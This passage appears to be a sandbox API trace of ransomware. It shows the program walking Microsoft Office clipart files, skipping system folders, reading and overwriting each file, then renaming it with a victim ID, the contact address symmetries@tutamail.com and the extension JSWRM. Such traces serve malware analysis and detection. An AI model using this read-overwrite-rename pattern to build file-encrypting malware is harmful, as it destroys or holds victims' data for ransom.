lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0096.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0096.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0096.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0096.689] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00671_.WMF", cAlternateFileName="")) returned 1 [0096.689] lstrcmpiW (lpString1="SO00671_.WMF", lpString2=".") returned 1 [0096.689] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="..") returned 1 [0096.689] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="...") returned 1 [0096.689] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="windows") returned -1 [0096.689] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="recovery") returned 1 [0096.690] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="perflogs") returned 1 [0096.690] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="documents and settings") returned 1 [0096.690] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.690] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="system volume information") returned -1 [0096.690] lstrcmpiW (lpString1="SO00671_.WMF", lpString2="msocache") returned 1 [0096.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00671_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00671_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00671_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0096.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00671_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00671_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00671_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0096.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0096.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.691] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1488) returned 1 [0096.691] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d0) returned 0x2332c0 [0096.691] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5d0, lpOverlapped=0x0) returned 1 [0096.692] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.692] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5d0, lpOverlapped=0x0) returned 1 [0096.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0096.692] CloseHandle (hObject=0x314) returned 1 [0096.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0096.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0096.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0096.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0096.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0096.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0096.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.693] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.694] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00683_.WMF", cAlternateFileName="")) returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2=".") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="..") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="...") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="windows") returned -1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="recovery") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="perflogs") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="documents and settings") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="system volume information") returned -1 [0096.694] lstrcmpiW (lpString1="SO00683_.WMF", lpString2="msocache") returned 1 [0096.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0096.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00683_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00683_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00683_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0096.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00683_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00683_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00683_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0096.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.695] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25270) returned 1 [0096.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x62b0) returned 0x24d210 [0096.695] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x62b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x62b0, lpOverlapped=0x0) returned 1 [0096.698] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.698] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x62b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x62b0, lpOverlapped=0x0) returned 1 [0096.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.698] CloseHandle (hObject=0x314) returned 1 [0096.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0096.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0096.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0096.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0096.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0096.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.699] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.700] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6302, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00694_.WMF", cAlternateFileName="")) returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2=".") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="..") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="...") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="windows") returned -1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="recovery") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="perflogs") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="documents and settings") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="system volume information") returned -1 [0096.700] lstrcmpiW (lpString1="SO00694_.WMF", lpString2="msocache") returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00694_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00694_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00694_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00694_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00694_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00694_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.701] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25346) returned 1 [0096.701] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6300) returned 0x24d210 [0096.701] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6300, lpOverlapped=0x0) returned 1 [0096.704] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.704] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6300, lpOverlapped=0x0) returned 1 [0096.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.704] CloseHandle (hObject=0x314) returned 1 [0096.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0096.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0096.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0096.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0096.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0096.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0096.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0096.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0096.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: 